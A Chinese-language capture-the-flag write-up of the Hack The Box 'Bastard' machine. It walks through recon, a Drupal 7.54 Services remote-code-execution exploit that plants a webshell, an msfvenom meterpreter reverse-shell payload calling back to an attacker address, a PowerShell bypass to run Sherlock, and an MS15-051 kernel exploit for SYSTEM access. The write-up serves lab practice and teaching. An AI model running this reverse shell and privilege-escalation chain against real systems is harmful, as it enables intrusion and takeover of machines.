htb打靶-Bastard

信息收集

1
nmap -sV -sT -sC -O 10.129.10.80          

开放了80,135,重点显然是在web上面了

image-20230703113702787

查看首页,drupal cmsimage-20230703113853299

google一下找到专用扫描器

1
https://github.com/immunIT/drupwn

给出了版本7.54但是发现扫不出,换工具!

image-20230703130700889

nday利用

换searchsploit寻找nday

image-20230703132821489

-m 编号,下载到当前目录,修改对应内容

image-20230703134008900

执行发现少一个扩展

image-20230703134031415

1
apt-get install php-curl

发现利用不成功

image-20230703134905651

google继续跟进这个exp,找到解释https://vk9-sec.com/drupal-7-x-module-services-remote-code-execution/

原来还需要找到这个路径

image-20230703135030563

确认存在,修改exp

image-20230703135134883

image-20230703135208562

利用成功,返回webshell路径

image-20230703135327900

命令执行

image-20230703135422132

上线msf

为了方便点可以先写个马上线蚁剑(重启后ip变了)

image-20230718195638106

将靶机上线到msf

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.31 LPORT=5555 -f exe > shell.exe

image-20230718201800576

试了几个常用的提权模块,但是提不下来

image-20230718203628750

下载提权脚本

1
git clone https://github.com/rasta-mouse/Sherlock.git

加载powershell

1
load powershell

导入powershell

1
powershell_import '/root/Desktop/Sherlock/Sherlock.ps1' # 本地ps脚本路径

执行

1
powershell_execute “find-allvulns”

或则直接上传上去运行

1
powershell.exe -exec bypass -Command "& {Import-Module C:\inetpub\drupal-7.54\Sherlock.ps1;Find-AllVulns}

image-20230718205948075

下载exp

1
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上传运行

image-20230718211429146

用system权限去运行后门,返回一个会话

image-20230718212140152

拿到flag

image-20230718212311870